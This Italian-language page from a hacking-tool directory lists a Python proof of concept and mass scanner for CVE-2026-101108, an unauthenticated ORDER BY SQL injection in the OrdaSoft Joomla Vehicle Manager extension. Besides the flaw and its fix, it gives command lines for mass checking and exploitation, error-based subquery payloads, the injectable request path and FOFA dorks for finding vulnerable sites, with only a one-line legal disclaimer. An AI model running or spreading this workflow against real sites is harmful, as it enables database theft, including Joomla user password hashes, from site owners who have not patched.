Skip to content
KitploitKITPLOIT
StrumentiBlog
Log in
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-101108 — PoC in Python 3 e scanner di massa per CVE-2026-101108, un'iniezione SQL ORDER BY non autenticata in OrdaSoft Joomla Vehicle Manager <=6.5.7 (com_vehiclemanager). | Kitploit
Strumenti/GitHubGitHub/murrez/cve-2026-101108
RicognizioneScanner di VulnerabilitàAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniSicurezza WebPenetration Testing
GitHubmurrez/cve-2026-101108

CVE-2026-101108

PoC in Python 3 e scanner di massa per CVE-2026-101108, un'iniezione SQL ORDER BY non autenticata in OrdaSoft Joomla Vehicle Manager <=6.5.7 (com_vehiclemanager).

4 giorni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
Condividi

CVE-2026-101108 — OrdaSoft Vehicle Manager (Free) SQL injection non autenticata

PoC in Python 3 per CVE-2026-101108 — estensione Joomla OrdaSoft Vehicle Manager (Free) ≤ 6.5.7. Corretta in 6.5.8+.

PoCbithttps://pocbit.org/pocs/cve-2026-101108
Catalogohttps://pocbit.org/pocs/
Componentecom_vehiclemanager
Filesite/vehiclemanager.php
Parametriorder_field, order_direction → ORDER BY (senza virgolette)
AutenticazioneNessuna (viste pubbliche categoria / ricerca / tutti i veicoli)
CWECWE-89 SQL Injection
CVSS 4.09.3 Critico (Joomla CNA)

Riepilogo della vulnerabilità (Türkçe)

Vehicle Manager (Free) è un'estensione OrdaSoft che offre annunci di veicoli su Joomla (categoria, ricerca, tutti i veicoli). Nelle versioni 6.5.7 e precedenti, i parametri di ordinamento order_field e order_direction vengono elaborati all'interno di site/vehiclemanager.php: sull'input viene applicato l'escaping, ma poiché il valore viene inserito in un'espressione ORDER BY senza virgolette, l'escaping rimane inefficace contro la SQLi (descrizione CNA).

Senza autenticazione, l'attaccante può leggere/scrivere nel database, con un rischio critico per gli hash degli utenti Joomla e l'integrità del sito. Aggiornare alla versione 6.5.8 o successiva.


Perché l'escaping fallisce in questo caso

Il tipico codice Joomla/PHP potrebbe far passare l'input dell'utente attraverso un "sanitizer" che effettua l'escaping delle virgolette per i letterali stringa. In ORDER BY, i nomi delle colonne e le espressioni non sono letterali stringa — la chiave di ordinamento viene concatenata come struttura SQL. Un attaccante fornisce espressioni come sottoquery basate su errori al posto di un vero nome di colonna. Il testo CNA per CVE-2026-101108 documenta esplicitamente questo schema di bypass dell'escaping.

Punti di ingresso frontend anonimi interessati:

  1. Elenco categoria (showCategory)
  2. Ricerca (search / task correlati)
  3. Elenco tutti i veicoli (showVehicles e simili)

Capacità del PoC

ModalitàComportamento
checkFingerprint del componente + versione del manifest, scoperta di catid/Itemid, conferma della SQLi
exploitDoppia query basata su errore in stile EXTRACTVALUE tramite ORDER BY
mass--list + -j per check massivo o estrazione massiva

Vettori di injection provati (il primo che riesce vince in exploit):

  • order_field GET
  • order_direction GET (asc,<subquery>)
  • order_field POST
  • order_direction POST

Campi JSONL: pocbit, pocbit_catalog, pocbit_page, cve, component.


Requisiti

cd CVE-2026-101108
pip install -r requirements.txt

Utilizzo

Target singolo

python poc.py -u https://target.example --mode check
python poc.py -u https://target.example --mode check --aggressive
python poc.py -u https://target.example --mode exploit
python poc.py -u https://target.example --mode exploit --subquery "SELECT user()"
python poc.py -u https://target.example --mode exploit --vector order_direction_get

Massivo in blocco (workflow orientato all'exploit)

python poc.py --list targets.example.txt --mode check -j 40 --vuln-list hits.txt
python poc.py --list hits.txt --mode exploit -j 15 --subquery "SELECT VERSION()" --exploited-list exploited.txt
FlagSignificato
--aggressiveLa modalità check tenta anche la fuga di SELECT VERSION()
--subquerySELECT interna per il payload basato su errore (MySQL)
--vectorForza uno dei quattro vettori ORDER BY
--exploited-listFughe separate da tab su exploit riuscito
--no-colorCLI semplice (NO_COLOR rispettato)

Codici di uscita: modalità exploit 0 quando exploited: true; modalità check 0 quando exploitable_candidate.


Esempio di superficie HTTP

Route categoria (parametri di ordinamento aggiunti dal PoC):

GET /index.php?option=com_vehiclemanager&task=showCategory&catid=1&order_field=<payload>&order_direction=asc HTTP/1.1

Baseline della route di ricerca costruita dal PoC:

GET /index.php?option=com_vehiclemanager&task=search&submit=Search&catid=0&maker=&fuel_type=all&model=all&listing_type=all&transmission=all HTTP/1.1

Rilevamento della versione

Quando leggibile:

  • /administrator/components/com_vehiclemanager/vehiclemanager.xml

Versione ≤ 6.5.7 → likely_vulnerable_version. ≥ 6.5.8 → patched_version.


Dork FOFA / discovery

body="option=com_vehiclemanager"
body="/components/com_vehiclemanager/" && body="Joomla"
title="Vehicle" && body="com_vehiclemanager"
body="ordasoft" && body="vehiclemanager"

Esporta gli host in targets.txt (un URL di base per riga), poi check → hits → exploit solo su asset autorizzati.


Contesto del batch OrdaSoft (Set 2026)

Stessa finestra di divulgazione delle CVE di Real Estate Manager (ad es. CVE-2026-100752 / CVE-2026-100753): diverse estensioni Joomla OrdaSoft hanno ricevuto correzioni per SQLi/XSS. Se utilizzi Vehicle Manager, applica la patch a tutti i componenti OrdaSoft che distribuisci.

CVEProdottoProblemaCorretto
CVE-2026-101108Vehicle Manager (Free)SQLi ORDER BY non autenticata6.5.8
CVE-2026-100752Real Estate ManagerSQLi ORDER BY non autenticata6.7.9

Credito (CNA): Ala Arfaoui.


Riferimenti

  • PoCbit CVE-2026-101108
  • CVE.report CVE-2026-101108
  • OrdaSoft Vehicle Manager
  • Ricerca legacy: SQLi in com_vehiclemanager (versioni precedenti, parametri di ricerca) — distinta ma correlata alla superficie del componente

Note legali

Solo test di sicurezza autorizzati e validazione di patch.


Descrizione del repository GitHub

CVE-2026-101108 PoC: OrdaSoft Joomla Vehicle Manager (Free) <=6.5.7 unauth SQLi — order_field/order_direction unquoted ORDER BY (com_vehiclemanager). Colored check + mass exploit, CVSS 9.3. https://pocbit.org/pocs/cve-2026-101108
Scarica lo strumento